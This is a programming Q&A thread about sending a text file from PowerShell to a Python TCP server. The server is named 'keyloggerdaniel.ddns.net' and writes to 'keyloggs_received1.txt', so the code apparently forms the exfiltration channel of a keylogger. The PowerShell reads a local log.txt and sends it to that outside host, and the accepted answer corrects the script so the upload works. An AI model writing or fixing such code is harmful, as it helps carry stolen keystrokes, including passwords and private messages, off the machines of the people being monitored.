# How to send string over powershell to a python server?

Tags: python, powershell, sockets, server, tcp

I'm trying to send a string from powershell to a python server running on an other device. However I always receive an Pipe broken error and I don't know what to do.

[image]

Here is my server: It listens for connections, receives messages and adds those to a txt file.

```
import socket
import threading

HEADER = 64
PORT = 1337
SERVER = 'keyloggerdaniel.ddns.net'
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
server.listen(5)

def handle_client(conn, addr):
    print(f"[NEW CONNECTION] {addr} connected.")
    filename = "keyloggs_received1.txt"
    file = open(filename, 'wb')
    connected = True
    while connected:
        msg_length = conn.recv(HEADER)
        if msg_length:
            msg_length = int(msg_length)
            msg = conn.recv(msg_length)
            #file_data = conn.recv(1024)
            file.write(msg)
            file.close()
        conn.send("Msg received".encode(FORMAT))
    print("File has been received successfully.")
    conn.close()

def start():
    server.listen()
    print(f"[LISTENING] Server is listening on {SERVER}")
    while True:
        conn, addr = server.accept()
        thread = threading.Thread(target=handle_client, args=(conn, addr))
        thread.start()
        print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")

print("[STARTING] server is starting...")
start()
```

Here is my  powershell code: I have the string on this pc and want to send it to the server:

```
$file = "C:\Users\Daniel Maderner\log.txt"
$file_Content =Get-Content $file
$socket = New-Object net.sockets.tcpclient('keyloggerdaniel.ddns.net',1337);
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$writer.WriteLine($file_Content);
$socket.close()
```

Comment: Your receive loop (in `handle_client`) in your python server is wrong, buggy, incorrect. To see why, read [this answer](https://stackoverflow.com/a/43420503/238704).

Answer (score 3):

I don't know whether that solves *all* problems, but try the following PowerShell code:

```
$socket = $stream = $null
$file = "C:\Users\Daniel Maderner\log.txt"
try {
  # Read the file as a *single, multi-line string*, with -Raw
  $file_Content = Get-Content -Raw $file
  $socket = New-Object net.sockets.tcpclient keyloggerdaniel.ddns.net, 1337
  $stream = $socket.GetStream()
  $writer = New-Object System.IO.StreamWriter $stream
  # Use .Write(), not .WriteLine() to write the file content as-is
  # to the stream.
  $writer.Write($file_Content)
}
catch { throw }
finally { if ($writer) { $writer.close() }; if ($socket) { $socket.close() } }
```

On the *Python* side, `conn.send("Msg received".encode(FORMAT))` is trying to send data *back* to the sender, which breaks, because your PowerShell code has by then already closed the socket - you could choose to ignore this error in your Python code.

---

As for **what you tried**:

- [`Get-Content`](https://learn.microsoft.com/powershell/module/microsoft.powershell.management/get-content) without the `-Raw` switch returns an *array* of lines, whereas [`System.IO.StreamWriter.WriteLine()`](https://learn.microsoft.com/en-US/dotnet/api/System.IO.StreamWriter.WriteLine) expects a *single string*.

  - If you accidentally pass an *array* of strings, PowerShell unhelpfully calls the `.ToString()` method on the array, which results in verbatim string `System.Object[]` (try `('foo', 'bar').ToString()`)
  - Therefore, use `-Raw` in order to read the entire file content as a *single*, (typically) multi-line string, which you can then write to the stream with `.Write()` (no need for `.WriteLine()`, as that would append an additional newline).
- Your code uses *pseudo method syntax* with [`New-Object`](https://learn.microsoft.com/powershell/module/microsoft.powershell.utility/new-object), e.g.
  `New-Object net.sockets.tcpclient('keyloggerdaniel.ddns.net',1337)`.

  - Instead, use *argument-mode syntax* e.g.,
    `New-Object net.sockets.tcpclient keyloggerdaniel.ddns.net, 1337`
  - PowerShell cmdlets, scripts and functions are invoked like *shell commands*, not like *methods*. That is, no parentheses around the argument list, and *whitespace*-separated arguments (`,` constructs an *array* as a *single argument*, as needed, for the (positionally implied) `-ArgumentList` parameter). See [this answer](https://stackoverflow.com/a/50636061/45375)
  - Alternatively, you *can* use method syntax if you switch to the static `::new()` method that is available on type literals in PowerShell v5+:

    ```
    [net.sockets.tcpclient]::new('keyloggerdaniel.ddns.net',1337)
    ```
- Finally, note that `;` is only ever needed to *separate* PowerShell statements if they are placed on a *single line*; you never need to explicitly *terminate* a given statement.